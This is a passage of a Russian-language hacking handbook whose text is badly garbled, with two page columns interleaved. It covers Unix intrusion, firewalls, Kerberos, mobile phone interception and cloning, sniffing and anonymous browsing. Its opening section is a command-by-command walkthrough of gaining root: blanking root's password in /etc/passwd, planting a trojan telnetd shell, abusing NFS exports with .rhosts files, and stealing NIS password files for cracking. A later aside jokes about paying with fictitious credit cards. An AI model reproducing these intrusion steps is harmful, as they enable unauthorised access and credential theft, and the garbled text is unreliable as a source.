серьезную ошибку, благодаря которой любой желающий имел возмож % ls ldg /etc ность выполнить на удаленной машине команды с привилегиями супер drwxr xr x 10 bin bin 1536 Apr 10 01:45 /etc/ пользователя. Обычно взломщики пытались отправить себе файл passwd % cd /etc для подбора паролей либо помещали свою информацию в файлы, ис ! Делаем passwd доступным на запись нам...

пользующиеся программами rlogin, rsh для запуска shell без запроса па % mv passwd passwd.was роля, например: % cp passwd.was passwd ! Редактируем crack% telnet target.remote.com % ed passwd Connecting to 123.456.654.321.

! соединяемся по порту 25 — это SMTP 1p 220 sendmail SMI/4.3.5.2 ready Хакерские трюки 247 248 Хакерские трюки root:Nkkh5gkljGyj:0:0:Root:/:/bin/csh ! Каталог доступен на запись s/Nkkh5gkljGyj//p drwxrwxr x 10 bin bin 1536 Apr 10 01:45 /usr/etc root::0:0:Root:/:/bin/csh % grep telnet /etc/inetd.conf w telnet stream nowait root /usr/etc/in.telnetd in.telnetd 2341 ! Нашли программу, которая запустится q !под root`ом из нашего каталога ! И в суперпользователя. % cd /usr/etc %echo /bin/csh i | su root % mv in.telnetd in.telnetd Warning! No access to terminal, job control disabled! ! создаем троянского коня target# mv /etc/passwd.was /etc/passwd % cat in.telnetd ! Чтобы никто не обнаружил, что мы делали. #!/bin/sh exec /bin/csh i Кроме электронной почты, в TCP/IP сетях очень широко приме ^D няются различные виды распределенных файловых систем, самой попу % chmod 755 in.telnetd лярной из которых является Network File System (NFS).

! и запускаем его В случае неаккуратного заполнения файла /etc/exports или ис % telnet 127. пользования дистрибутива с ошибкой (SunOS 4.1) может возникнуть Connecting 127.1.

следующая ситуация:

Warning! No access to terminal, job control disabled!

# chown user /etc;

crack% showmount e target.remote.com ! Делаем /etc своим Export list for target.remote.com ^M: command not found /home Everyone # exit;

/disk3 neptun pluton alpha ^M: command not found ! Домашние каталоги доступны по NFS Connection closed by foreign host.

crack% su % cd /etc # mount t nfs target.remote.com:/home /mnt ! и далее, как в примере выше.

# cd /mnt ! Монтируем каталог к нам Если на машине работает NIS сервер и не принято дополнитель # ls ldg * ных мер, то с помощью специальной программы можно утащить по сети drwxr xr x 10 257 20 1536 Apr 10 01:45 user/ файл passwd, общий для некоторого числа машин. В случае несоблюде # echo crack.edu user/.rhosts ния правил при создании паролей есть довольно приличная вероятность, ! Устанавливаем.rhosts у пользователя что программа crack подберет несколько. Дальнейшие события могут # cat /etc/passwd разворачиваться по одному из сценариев для получения полномочий су user::257:20::/:

перпользователя (после того, как вы зашли на удаленную машину как ^D пользователь):

! Создаем такого же у нас ! проверяем на NIS сервер # su — user crack% rpcinfo p target.remote.com | grep bind ! Становимся им 120000 2 udp 2493 ypbind $ rsh target.remote.com /bin/csh i ! есть такой...

Warning! No access to terminal, job control disabled!

crack% ypx o target.passwd g target.remote.com ! И заходим на удаленную машину ! забираем файл паролей % id crack% crack target.passwd uid=257(user) gid=20(stuff) groups=20(stuff), 7(sys) ! и запускаем подборщик паролей % ls ldg /usr/etc [ a lot of time ] Хакерские трюки 249 250 Хакерские трюки OK, user user has password iamuser Password: you@your.site ! нашли, заходим 230 — Hello, user@our.workstation.our.company.com crack% telnet target.remote.com то в случае программного брандмауэра надо набирать:

! далее как в предыдущем примере.

% ftp our soft firewall Естественно, что если известны способы преодоления защиты, то Name: (our soft firewall:user) ftp@arch.kiae.su должны быть разработаны и средства защиты. Для минимизации воз Password: XXXXXXX можных попыток проникновения в сеть очень эффективен маршрутиза Connected to arch.kiae.su тор, умеющий анализировать поток проходящей через него информации Name: (arch.kiae.su: ftp) и осуществляющий фильтрацию пакетов. Эта возможность реализована 230 Guest login ok, send ident as password практически во всех аппаратных маршрутизаторах (cisco, wellfleet...) Password: you@your.site и в виде специального ПО для Unix машин (Sun, DEC, BSDI, FreeBSD).

230 — Hello, user@our sort firewall.our.company.com Такие маршрутизаторы позволяют осуществлять работу в сети Аналогично работают telnet, rlogin, X11 и т.д.

строго по определенным правилам. Например, не пропускать из/в ло кальную сеть некоторые протоколы. Очень рекомендуется запрещать Борьба с возможностью анализа содержания rlogin, rsh, RPC (см. Примеры), а также пакеты, направленные на порты IP пакетов 2048 и 2049 — это порты данных для NFS. Также рекомендуется четко оп Все рассмотренные выше примеры относятся к так называемым ределить машины, принимающие почту, и открыть порт 25 только для активным методам. Аккуратное администрирование системы легко сво них. При необходимости возможна конфигурация, которая вообще за дит на нет все рассмотренные дырки, но совершенно бессильно в случае прещает какие либо заходы по сети в локальную сеть, при этом разрешая применения пассивной атаки. Что это такое? Самый распространенный, изнутри использовать любые TCP сервисы глобальной сети. Подобный простой в исполнении способ — анализ информации, передаваемой по маршрутизатор или комбинация из нескольких машин и фильтрующих каналам связи, преимущественно по сети Ethernet.

маршрутизаторов получили название брандмауэр (от англ. firewall — сте на огня).

Основан он на свойстве этой сети, благодаря которому каждый пе редаваемый пакет может быть проанализирован любой машиной, под Для установления полного контроля за всеми соединениями мож ключенной на этот сегмент сети. При наличии достаточно быстрой ма но использовать так называемый программный брандмауэр (software fire шины с адаптером, разрешающим работу в режиме приема всех пакетов, wall). Он представляет собой своеобразный маршрутизатор, который можно легко извлекать такую информацию, как пароли пакетов NFS.

осуществляет контроль за соединениями не на уровне IP пакетов, а на уровне собственно контролируемых протоколов.

Если на этом сегменте расположено несколько маршрутизаторов, то в наш фильтр попадут не только пароли нашей сети, но и те, которы В этом случае режим прозрачной пересылки пакетов выключен, ми обмениваются маршрутизаторы. Таким образом, за сравнительно ко но вместо программ, обеспечивающих работу с необходимыми протоко роткое время можно собрать коллекцию паролей на нескольких сотнях лами (telnet, ftp...), запускаются программы, которые транслируют эти машин.

протоколы в сеть по другую сторону машины, обычно сверившись по ба зе данных на предмет правомерности такого соединения и после иденти Для борьбы с такими методами в конце 80 х годов была разработа фикации пользователя.

на система сетевой идентификации пользователя под названием Kerberos. Основной целью было полное исключение пересылки паролей Для пользователя такой брандмауэр выглядит единственным ок по сети. Пользователь вводит пароль только один раз при регистрации в ном во внешний мир. Например, если в сети для того, чтобы зайти по ftp системе, после чего ему выделяется билет на несколько часов, который на машину arch.kiae.su, вам надо набрать:

хранится в файле в зашифрованном виде.

% ftp arch.kiae.su Этот билет содержит информацию о пользователе, время выдачи, Connected to arch.kiae.su адрес машины и случайно сгенерированный ключ для дальнейшего об Name: (arch.kiae.su: you) мена идентификационной информацией. Первоначальным ключом слу 230 Guest login ok, send ident as password Хакерские трюки 251 252 Хакерские трюки жит пароль пользователя. Билет, выданный при входе в систему, исполь Глава 23.

зуется для получения вторичных билетов, по которым может быть предо Мобильная связь ставлен какой либо сетевой сервис.

Со стороны сервера используется аналогичный механизм с той Так уж устроен мир, что любое техническое изобретение человече разницей, что в качестве пользователя выступает программа, обеспечи ского разума, расширяющее наши возможности и создающее для нас до вающая запрошенный вид услуги. Таким образом, программа пользова полнительный комфорт, неизбежно содержит в себе и отрицательные теля и программа на сервере получают пару случайных ключей, с помо стороны, которые могут представлять потенциальную опасность для щью которых они шифруют идентификационную информацию, пользователя. Не являются исключением в этом плане и современные прилагают к ней контрольные суммы и на этой основе удостоверяются средства беспроводной персональной связи. Да, они несоизмеримо рас в том, что они те, кем представились.

ширили нашу свободу, «отвязав» нас от телефонного аппарата на рабо чем столе и дав нам возможность в любое время и в любом месте связать После этого программа пользователя может получить доступ ся с необходимым корреспондентом. Но немногие знают, что эти «чудеса к сервису без запроса пароля. Без знания первоначальных ключей сеанс техники» скрывают в себе весьма опасные «ловушки». И для того, чтобы не состоится. Кроме того, полученная пара ключей может быть исполь однажды ваш помощник — скажем, сотовый телефон — не превратился зована для шифрования всего сеанса работы по сети. Эта система имеет в вашего врага, эти «ловушки» следует хорошо изучить.

целый ряд недостатков. Во первых, подразумевается четкое разделение машин на рабочие станции и серверы. В случае, если пользователь поже Чтобы лучше понять проблемы, связанные с использованием бес лает, зайдя на сервер, с помощью telnet зайти на другую машину, иденти проводных средств связи, давайте вспомним, что эти средства из себя фикация не сработает, так как пользователь имеет первоначальный би представляют и как работают.

лет только на той рабочей станции, где он вводил пароль.

Современные беспроводные средства персональной связи вклю Иными словами, в Kerberos версии 4 полномочия пользователя не чают в себя мобильные телефоны сотовой связи, пейджеры и беспровод передаются на другие машины. Кроме того, требуется выделенная маши ные стационарные радиотелефоны.

на под сервер Kerberos, причем работающая в максимально секретных Мобильные телефоны сотовой связи фактически являются слож условиях, поскольку на ней содержится база данных, где содержатся все ной миниатюрной приемо передающей радиостанцией. Каждому сото пароли пользователей. Kerberos версии 4 очень ограниченно применим в вому телефонному аппарату присваивается свой электронный серийный сети, где возможны ситуации, когда в силу ряда обстоятельств сервер номер (ESN), который кодируется в микрочипе телефона при его изго Kerberos недоступен по сети (непредвиденные сбои в роутинге, ухудше товлении и сообщается изготовителями аппаратуры специалистам, осу ние или обрыв связи и т.д.).

ществляющим его обслуживание. Кроме того, некоторые изготовители Часть недостатков, перечисленных выше, ликвидирована в вер указывают этот номер в руководстве для пользователя. При подключе сии 5, но эта реализация запрещена к экспорту из США. По описанному нии аппарата к сотовой системе связи техники компании, предоставля алгоритму работают также системы Sphinx от DEC и NIS+ от Sun. Отли ющей услуги этой связи, дополнительно заносят в микрочип телефона чаются они применением различных алгоритмов шифрования, другого еще и мобильный идентификационный номер (MIN).

протокола передачи (RPC вместо UDP) и способов объединения адми Мобильный сотовый телефон имеет большую, а иногда и неогра нистративных доменов в иерархию.

ниченную дальность действия, которую обеспечивает сотовая структура Кроме рассмотренных, существуют и другие, более изощренные, зон связи. Вся территория, обслуживаемая сотовой системой связи, раз способы вторжения. Многие из них можно нейтрализовать простым ак делена на отдельные прилегающие друг к другу зоны связи, или «соты».

куратным администрированием. По статистике, большинство взломов Телефонный обмен в каждой такой зоне управляется базовой станцией, осуществляется из за халатности администраторов или персонала, экс способной принимать и передавать сигналы на большом количестве ра плуатирующего систему. He откладывая в долгий ящик, проверьте пере диочастот. Кроме того, эта станция подключена к обычной проводной численные выше способы несанкционированного доступа — если удаст телефонной сети и оснащена аппаратурой преобразования высокочас ся взломать ваш компьютер вам, то это могут сделать и другие.

тотного сигнала сотового телефона в низкочастотный сигнал проводно Хакерские трюки 253 254 Хакерские трюки го телефона и наоборот, чем обеспечивается сопряжение обеих систем. точки зрения — да. А с точки зрения безопасности передаваемой инфор Периодически (с интервалом 30 60 минут) базовая станция излучает слу мации?

жебный сигнал. Приняв его, мобильный телефон автоматически добав В настоящее время электронный перехват разговоров, ведущихся ляет к нему свои MIN и ESN номера и передает получившуюся кодовую по сотовому или беспроводному радиотелефону, стал широко распро комбинацию на базовую станцию. В результате этого осуществляется страненным явлением.

идентификация конкретного сотового телефона, номера счета его вла дельца и привязка аппарата к определенной зоне, в которой он находит Так, например, в Канаде, по статистическим данным, от 20 до 80% ся в данный момент времени.

радиообмена, ведущегося с помощью сотовых телефонов, случайно или преднамеренно прослушивается посторонними лицами.

Когда пользователь звонит по своему телефону, базовая станция выделяет ему одну из свободных частот той зоны, в которой он находит Электронный перехват сотовой связи не только легко осуще ся, вносит соответствующие изменения в его счет и передает его вызов по ствить, он, к тому же, не требует больших затрат на аппаратуру, и его поч назначению. Если мобильный пользователь во время разговора переме ти невозможно обнаружить. На Западе прослушивание и/или запись раз щается из одной зоны связи в другую, базовая станция покидаемой зоны говоров, ведущихся с помощью беспроводных средств связи, автоматически переводит сигнал на свободную частоту новой зоны.

практикуют правоохранительные органы, частные детективы, промыш ленные шпионы, представители прессы, телефонные компании, ком Пейджеры представляют собой мобильные радиоприемники с ус пьютерные хакеры и т.п.

тройством регистрации сообщений в буквенном, цифровом или смешан ном представлении, работающие, в основном, в диапазоне 100 400 МГц.

В западных странах уже давно известно, что мобильные сотовые Система пейджинговой связи принимает сообщение от телефонного телефоны, особенно аналоговые, являются самыми уязвимыми с точки абонента, кодирует его в нужный формат и передает на пейджер вызыва зрения защиты передаваемой информации.

емого абонента.

Принцип передачи информации такими устройствами основан Стационарный беспроводный радиотелефон объединяет в себе на излучении в эфир радиосигнала, поэтому любой человек, настроив обычный проводный телефон, представленный самим аппаратом, под соответствующее радиоприемное устройство на ту же частоту, может ус ключенным к телефонной сети, и приемо передающее радиоустройство лышать каждое ваше слово. Для этого даже не нужно иметь особо слож в виде телефонной трубки, обеспечивающей двусторонний обмен сигна ной аппаратуры. Разговор, ведущийся с сотового телефона, может быть лами с базовым аппаратом. В зависимости от типа радиотелефона, даль прослушан с помощью продающихся на Западе программируемых скан ность связи между трубкой и аппаратом, с учетом наличия помех и пере еров с полосой приема 30 кГц, способных осуществлять поиск в диапа отражающих поверхностей, составляет в среднем до 50 метров.

зоне 860 890 МГц. Для этой же цели можно использовать и обычные сканеры после их небольшой модификации, которая, кстати, весьма по Проблема безопасности при пользовании сотовым телефоном дробно описана в Internet`е. Перехватить разговор можно даже путем и другими мобильными средствами персональной беспроводной связи медленной перестройки УКВ тюнера в телевизорах старых моделей в имеет два аспекта: физическая безопасность пользователя и безопас верхней полосе телевизионных каналов (от 67 до 69), а иногда и с помо ность информации, передаваемой с помощью этих устройств. Здесь сра щью обычного радиотюнера. Наконец, такой перехват можно осуще зу следует оговориться, что угрозу физической безопасности создает ствить с помощью ПК.

только мобильный сотовый телефон, так как пейджеры и стационарные радиотелефоны являются не излучающими или слабо излучающими ус Легче всего перехватываются неподвижные или стационарные со тройствами и характеризуются отличными от сотовых телефонов услови товые телефоны, труднее — мобильные, так как перемещение абонента в ями и порядком пользования. процессе разговора сопровождается снижением мощности сигнала и пе реходом на другие частоты в случае передачи сигнала с одной базовой станции на другую.

Проблема защиты информации Вы, наверное, не раз слышали рекламу компаний, предоставляю Более совершенны с точки зрения защиты информации цифровые щих услуги сотовой связи: «Надежная связь по доступной цене!». Давай сотовые телефоны, передающие информацию в виде цифрового кода.

те проанализируем, действительно ли она так уж надежна. С технической Хакерские трюки 255 256 Хакерские трюки Однако используемый в них алгоритм шифрования Cellular Message Мошенничество Encryption Algorithm (CMEA) может быть вскрыт опытным специали Мошенничество в сотовых системах связи, известное еще под на стом в течение нескольких минут с помощью персонального компьюте званием «клонирование», основано на том, что абонент использует чу ра. Что касается цифровых кодов, набираемых на клавиатуре цифрового жой идентификационный номер (а, следовательно, и счет) в корыстных сотового телефона (телефонные номера, номера кредитных карточек или интересах. В связи с развитием быстродействующих цифровых сотовых персональные идентификационные номера PIN), то они могут быть лег технологий способы мошенничества становятся все более изощренны ко перехвачены с помощью того же цифрового сканнера.

ми, но общая схема их такова: мошенники перехватывают с помощью сканеров идентифицирующий сигнал чужого телефона, которым он от Не менее уязвимыми с точки зрения безопасности информации вечает на запрос базовой станции, выделяют из него идентификацион являются беспроводные радиотелефоны. Они при работе используют две ные номера MIN и ESN и перепрограммируют этими номерами микро радиочастоты: одну – для передачи сигнала от аппарата к трубке (на ней чип своего телефона. В результате стоимость разговора с этого аппарата прослушиваются оба абонента), другую – от трубки к аппарату (на ней заносится базовой станцией на счет того абонента, у которого эти номе прослушивается только абонент, говорящий в эту трубку). Наличие двух ра были украдены.

частот еще больше расширяет возможности для перехвата.

Например, в больших городах Запада, чаще всего в аэропортах, ра Перехват радиотелефона можно осуществить с помощью другого ботают мошенники, которые, клонировав ESN номер чьего либо мо радиотелефона, работающего на тех же частотах, радиоприемника или бильного телефона, предоставляют за плату возможность другим людям сканнера, работающих в диапазоне 46 50МГц. Дальность перехвата, в за звонить с этого телефона в отдаленные страны за счет того, чей номер висимости от конкретных условий, составляет в среднем до 400 метров, а выкрали.

при использовании дополнительной дипольной антенны диапазона 46 49 МГц — до 1,5 км.

Кража номеров осуществляется, как правило, в деловых районах и в местах скопления большого количества людей: шоссе, дорожные Следует отметить, что такие часто рекламируемые возможности пробки, парки, аэропорты, — с помощью очень легкого, малогабаритно беспроводного телефона, как «цифровой код безопасности» (digital secu го, автоматического оборудования. Выбрав удобное место и включив rity code) и «снижение уровня помех» (interference reduction), нисколько свою аппаратуру, мошенник может за короткий промежуток времени на не предотвращают возможность перехвата разговоров. Они только пре полнить память своего устройства большим количеством номеров.

пятствуют несанкционированному использованию этого телефона и не дают соседствующим радиотелефонам звонить одновременно. Сложнее Наиболее опасным устройством является так называемый сото перехватить цифровые радиотелефоны, которые могут использовать при вый кэш бокс, представляющий собой комбинацию сканера, компьюте работе от 10 до 30 частот с автоматической их сменой. Однако и их пере ра и сотового телефона. Он легко выявляет и запоминает номера MIN и хват не представляет особой трудности при наличии радиосканера.

ESN и автоматически перепрограммирует себя на них. Использовав пару MIN/ESN один раз, он стирает ее из памяти и выбирает другую. Такой Такими же уязвимыми в отношении безопасности передаваемой аппарат делает выявление мошенничества практически невозможным.

информации являются и пейджеры. В большинстве своем они использу Несмотря на то, что эта аппаратура на Западе пока еще редка и дорога, ют протокол POSCAG, который практически не обеспечивает защиты от она уже существует и представляет растущую опасность для пользовате перехвата. Сообщения в пейджинговой системе связи могут перехваты лей сотовой связи.

ваться радиоприемниками или сканерами, оборудованными устройства ми, способными декодировать коды ASCII, Baudot, CTCSS, POCSAG и GOLAY. Существует также целый ряд программных средств, которые Выявление местоположения абонента позволяют ПК в сочетании со сканнером автоматически захватывать ра Оставим в стороне такую очевидную возможность, как выявление бочую частоту нужного пейджера или контролировать весь обмен в кон адреса абонента сотовой системы связи через компанию, предоставля кретном канале пейджинговой связи. Эти программы предусматривают ющую ему эти услуги. Немногие знают, что наличие мобильного сотово возможность перехвата до 5000 (!) пейджеров одновременно и хранение го телефона позволяет определить как текущее местоположение его вла всей переданной на них информации.

дельца, так и проследить его перемещения в прошлом.

Хакерские трюки 257 258 Хакерские трюки Текущее положение может выявляться двумя способами. Первым только провайдеры связи (например, введение цифровых систем). Пого из них является обычный метод триангуляции (пеленгования), опреде ворим о том, что можете сделать вы сами.

ляющий направление на работающий передатчик из нескольких (обыч Для предотвращения перехвата информации:

но трех) точек и дающий засечку местоположения источника радиосиг налов. Необходимая для этого аппаратура хорошо разработана, обладает используйте общепринятые меры по предупреждению высокой точностью и вполне доступна.

раскрытия информации: избегайте или сведите к минимуму передачу конфиденциальной информации, Второй метод — через компьютер предоставляющей связь компа такой как номера кредитных карточек, финансовые нии, который постоянно регистрирует, где находится тот или иной або вопросы, пароли. Прибегайте в этих целях к более нент в данный момент времени даже в том случае, когда он не ведет ни надежным проводным телефонам, убедившись, однако, каких разговоров (по идентифицирующим служебным сигналам, что ваш собеседник не использует в этот момент автоматически передаваемым телефоном на базовую станцию, о которых радиотелефон. Не используйте сотовые или беспроводные мы говорили выше). Точность определения местонахождения абонента в телефоны для ведения деловых разговоров;

этом случае зависит от целого ряда факторов: топографии местности, на личия помех и переотражений от зданий, положения базовых станций, помните, что труднее перехватить разговор, который количества работающих в настоящий момент телефонов в данной соте.

ведется с движущегося автомобиля, т.к. расстояние между Большое значение имеет и размер соты, в которой находится абонент, ним и перехватывающей аппаратурой (если та находится поэтому точность определения его положения в городе гораздо выше, не в автомобиле) увеличивается и сигнал ослабевает.

Кроме того, при этом ваш сигнал переводится с одной чем в сельской местности (размер соты в городе составляет около 1 км базовой станции на другую с одновременной сменой против 50 70 км2 на открытой местности) и, по имеющимся данным, со рабочей частоты, что не позволяет перехватить весь ставляет несколько сот метров.

разговор целиком, поскольку для нахождения этой новой Наконец, анализ данных о сеансах связи абонента с различными частоты требуется время;

базовыми станциями (через какую и на какую базовую станцию переда используйте системы связи, в которых данные передаются вался вызов, дата вызова и т.п.) позволяет восстановить все перемещения с большой скоростью при частой автоматической смене абонента в прошлом. Такие данные автоматически регистрируются в частот в течение разговора;

компьютерах компаний, предоставляющих услуги сотовой связи, по скольку оплата этих услуг основана на длительности использования сис используйте, при возможности, цифровые сотовые темы связи. В зависимости от фирмы, услугами которой пользуется або телефоны;

нент, эти данные могут храниться от 60 дней до 7 лет.

отключите полностью свой сотовый телефон, если не Такой метод восстановления картины перемещений абонента хотите, чтобы ваше местоположение стало кому то очень широко применяется полицией многих западных стран при рас известно.

следованиях, поскольку дает возможность восстановить с точностью до В случае использования беспроводного радиотелефона:

минут, где был подозреваемый, с кем встречался (если у второго тоже был сотовый телефон), где и как долго происходила встреча или был ли при покупке выясните, какую защиту он предусматривает;

подозреваемый поблизости от места преступления в момент его совер используйте радиотелефоны с автоматической сменой шения.

рабочих частот типа «spread spectrum» или цифровые, работающие на частотах порядка 900 МГц;

Некоторые рекомендации при возможности, используйте радиотелефоны со Проблема безопасности при использовании современных беспро встроенным чипом для шифрования сигнала.

водных средств связи достаточно серьезна, но, используя здравый смысл и известные приемы противодействия, ее можно, в той или иной степе ни, решить. Не будем затрагивать тех мер, которые могут предпринять Хакерские трюки 259 260 Хакерские трюки Для предотвращения мошенничества: узел может получать информацию, которая предназначается не ему. «От лов» этой информации в сети и называется sniff'ингом.

узнайте у фирмы производителя, какие средства против мошенничества интегрированы в ваш аппарат;

Наиболее простой способ соединения компьютеров — ethernet.

Обмен данными по протоколу Ethernet подразумевает посылку пакетов держите документы с ESN номером вашего телефона всем абонентам сети. Заголовок пакета содержит адрес узла приемника.

в надежном месте;

Предполагается, что только узел с соответствующим адресом мо ежемесячно и тщательно проверяйте счета на пользование жет принять пакет. Однако через каждый узел проходят все пакеты, не сотовой связью;

взирая на их заголовки.

в случае кражи или пропажи вашего сотового телефона Так как в обычной сети информация о паролях передается по сразу предупредите фирму, предоставляющую вам услуги ethernet в виде текста — нет ничего сложного, вытягивая и анализируя сотовой связи;

пакеты, проходящие по сети, получить информацию обо всех компью терах сети.

держите телефон отключенным до того момента, пока вы не решили им воспользоваться. Этот способ самый легкий и дешевый, но следует помнить, что для опытного Область применения сниффинга специалиста достаточно одного вашего выхода на связь, Sniff'инг — один из наиболее популярных видов атаки, использу чтобы выявить MIN/ESN номера вашего аппарата;

емых хакерами. Программный Sniff'ер называемый Esniff.c — очень ма ленький, разработанный для работы на SunOS, занимался тем, что вы регулярно меняйте через компанию, предоставляющую лавливал первые 300 байт telnet, ftp и rlogin сессий. Он был опубликован вам услуги сотовой связи, MIN номер вашего аппарата.

в «Phrack» — одном из наиболее широко доступных подпольных хакер Этот способ несколько сложнее предыдущего и требует ских журналов. Вы его можете найти на многих FTP сайтах. Например, времени;

на ftp://coombs.anu.edu.au/pub/net/log.

попросите компанию, предоставляющую вам услуги сотовой связи, установить для вашего телефона дополнительный 4 х значный PIN код, набираемый перед Глава 25.

разговором. Этот код затрудняет деятельность Общие принципы работы On Line услуг мошенников, так как они обычно перехватывают только MIN и ESN номера, но, к сожалению, небольшая До последнего времени работа в TCP/IP и X.25 сетях требовала не модификация аппаратуры перехвата позволяет выявить которых профессиональных знаний и навыков, не всегда доступных для и его;

обычных пользователей компьютеров. Вероятно, поэтому были созданы наиболее эффективным методом противодействия сервисы, для работы с которыми не требуется профессиональных зна является шифрование MIN/ESN номера (вместе с ний. Пользователь, заплатив некоторую сумму денег, получает доступ к голосовым сигналом) по случайному закону. Но этот метод необходимым ему информационным ресурсам с помощью некой про дорог и пока малодоступен. граммы оболочки или просто в диалоговом режиме.

Доступ к разнообразным On Line услугам осуществляется в том числе и по сетям пакетной коммутации (X.25). Поскольку сети x.25 ши Глава 24.

роко распространены и общедоступны, то общение с On Line сервисами Сниффинг не представляет никакого труда. В рекламных целях продавцы этих услуг помещают программы, необходимые для работы в качестве бонуса к мо В отличие от телефонной сети, компьютерные сети используют демам, а также предоставляют несколько условно бесплатных часов ра общие коммуникационные каналы, т.к. достаточно дорого тянуть петлю боты с их сервисом.

до каждого узла. Совместное использование каналов подразумевает, что Хакерские трюки 261 262 Хакерские трюки Большинство On Line сервисов предоставляет свои услуги на ос правляясь по ссылке, помещенной на странице, которую вы просматри нове данных, полученных от работающих с ними пользователей. Так как ваете с помощью Анонимайзера, вы попадаете на очередную страницу часто при работе через X.25 местоположение пользователя не проверяет снова через Анонимайзер, так что процесс автоматизирован, и набирать ся, то существует возможность указать при регистрации некорректные новый URL снова не нужно. Были времена, когда Анонимайзер отправ сведения о пользователе и о его финансовых возможностях. На этом лялся по указанному адресу немедленно, теперь же для тех, кто пользует принципе построены альтернативные методы оплаты за On Line ся этой службой бесплатно, существует 30 секундный период ожидания.

услуги... Кроме того, Анонимайзер позволял использовать как HTTP, так и FTP ресурсами. Теперь же использовать FTP могут лишь зарегистриро ванные пользователи.

Глава 26.

При использовании этой службы след в log файлах оставляете не По WWW без следов вы, а Анонимайзер, что исключает возможность сбора всей той инфор мации, о которой было написано выше. Никакие cookies до вас не дохо Путешествуя по Internet, мы не часто задумываемся о том, что ос дят. Некоторые сайты, например, Web chat rooms и отдельные почтовые тавляем следы своих посещений каждый раз, когда заходим на какой ли службы, через него недоступны, что, очевидно, объясняется желанием их бо сайт. Пожалуй, об этом и не стоило бы беспокоиться, если бы не был владельцев следить за посетителями. Анонимайзер также не работает так велик тот объем информации, который потенциально могут добыть о с безопасными узлами, использующими SSL протокол.

нас владельцы сайта. Стандартные log файлы, хитроумные скрипты и Анонимайзер имеет еще две приятные особенности. Во первых, прочие ухищрения любопытных владельцев способны узнать о вас мно некоторые сайты WWW бывают недоступны из одного места, но доступ гое: тип компьютера и операционной системы, страну пребывания, на ны из другого. Недавно автор в течении 20 минут безуспешно пытался звание и адрес провайдера и, зачастую, даже адрес электронной почты попасть на один сайт в Австралии, находясь в России. Использование и ваше имя.

Анонимайзера немедленно проблему решило, и долгожданная страница Существует много причин, по которым пользователь может не за быстро загрузилась.

хотеть оставлять следы своего пребывания. Тут и нежелание раскрыть Во вторых, некоторые сайты выдают вам информацию в зависи свой адрес электронной почты, чтобы не стать жертвой спама, и необхо мости от того, откуда поступает ваш запрос. Пример из жизни. Находясь димость получить информацию с сайта, который варьирует ответ в зави на сайте Encyclopaedia Britannica, автор захотел выяснить цены на про симости от страны, из которой отправлен запрос. Или, например, вы ча дукцию этой фирмы. Нажатие на кнопку Order Information привело его на стенько заходите на Web узел ваших конкурентов и хотите делать это страницу, содержащую список дилеров по всему миру, включая и мос анонимно.

ковского дилера — «Мир Знаний». Заход на ту же страницу через Анони Некто, поддерживающий работу сайта своей юридической фир майзер дал совершенно другой результат: на экране появился мы, регулярно составляет график его посещения самыми серьезными прайс лист. Сравнение показало, что в Москве Encyclopaedia Britannica конкурентами его фирмы, которые проводят там довольно много време CD'97 продается во много раз дороже, чем в Штатах. Мораль: пользуй ни, что, вкупе с ситуацией на рынке юридических услуг, дает богатую ин тесь Анонимайзером и не покупайте ничего в «Мире Знаний».

формацию к размышлению.

Кроме того, существуют такие бяки, как cookies, да и дыры в безо Служба iproxy пасности в MSIE обнаруживаются все новые и новые... В общем, не по Эта служба, располагающаяся по адресу www.iproxy.com, работает слать ли нам в путешествие по WWW кого нибудь еще? Идея трезвая подобно Анонимайзеру. От пользователя требуется заполнить неболь и достаточно легко выполнимая, причем несколькими способами.

шую анкету, указать свой электронный адрес, и после получения под тверждения по электронной почте и ответа на это подтверждение можно Анонимайзер отправляться в путь, причем без 30 секундных задержек, как в случае с Анонимайзером. Обмен подтверждениями несколько настораживает, Осуществить подобный анонимный серфинг позволяет служба обнаруживая то, что владельцам службы на самом деле на privacy напле Anonymizer. Зайдите на их сайт, наберите нужный URL, и вперед! От Хакерские трюки 263 264 Хакерские трюки вать, но, поскольку получить анонимный адрес — не проблема, а работа IP адресе, как, впрочем и об IP адресе прокси сервера, который вы ис ет iproxy быстрее Анонимайзера, представляется разумным использовать пользуете. Если же сообщение гласит: Proxy server is not detected — все эту службу. Единственное «но» — сервер иногда бывает в «дауне», при в порядке!

чем это может продолжаться целую неделю.

В заключение еще несколько соображений касательно использо вания прокси серверов. Работа через далеко расположенный прокси Прокси серверы снижает скорость передачи данных и время ожидания. Прокси, настро Анонимизировать путешествие по сети можно также с помощью енный на HTTP протокол, не анонимизирует работу с SSL узлами, ра прокси сервера. Прокси сервер работает, по сути, как Анонимайзер, т.е.

ботающими по протоколу HTTPS (это для вас, любители расплатиться документ с сайта «забирает» он, а не вы. Правда, есть некоторые немало фиктивной кредитной карточкой).

важные отличия, а именно:

от cookies вас прокси не избавляет (избавьте от них себя Глава 27.

сами, сделайте файл cookies.txt read only, и все дела!);

Атака прокси сервер работает как с HTTP, так и с FTP, что дает возможность анонимизировать посещение не только Во первых, пусть название главы вас не пугает... или пугает, но не Web сайтов, но и FTP архивов. Вообще говоря, очень сильно. Речь идет всего лишь о том, что когда компьютер подклю прокси серверы поддерживают и другие протоколы, но чен к сети, он становится ее частью. К сожалению, большинство пользо для анонимного путешествия по сети они мало значимы;

вателей забывает об этой совершенно тривиальной истине. Меж тем за бывать о ней не стоит, ибо несколько практических выводов, которые из IP адрес вашего родного прокси сервера, т.е. того, нее следуют, таковы:

пользование которым обеспечивает ваш провайдер, все равно отражает имя вашего домена или, по крайней мере, Вы имеете доступ к миллионам компьютеров Internet, его примерное географическое положение.

а миллионы компьютеров Internet зачастую имеют доступ к вашему компьютеру.

Последний пункт приводит нас к следующему выводу: если вам очень важно остаться анонимным при работе с каким нибудь сайтом или Загружая программы из сети, вы можете заполучить на при чтении и отправке почты с использованием обозревателя, исполь свой диск программу троянца или вирус.

зуйте не свой прокси сервер, а чужой.

Любой компьютер в сети подвержен различным Большинство прокси серверов ограничивают доступ на основа техническим атакам, которые могут привести к его нии IP адреса, с которого происходит обращение. Иными словами, если зависанию, потере данных и прочим прелестям.

вы пользуетесь провайдером Demos, то прокси сервер Glasnet вас к себе Ну, а теперь рассмотрим все это подробнее, спокойно и без исте попросту не пустит. Но, к счастью, в сети всегда можно найти «добрый» рик. Разговор пойдет о компьютерах, работающих под Windows 95/ прокси, владельцы которого либо открыто заявляют о его доступности 98/NT. Знатоки (опытные пользователи, гуру, хакеры) могут удалиться, для всех желающих, либо прокси, который по той или иной причине не начинающие (неопытные пользователи, женщины, дети, военные) могут ограничивает доступ только своим доменам, о чем широкой публике не остаться.

известно.

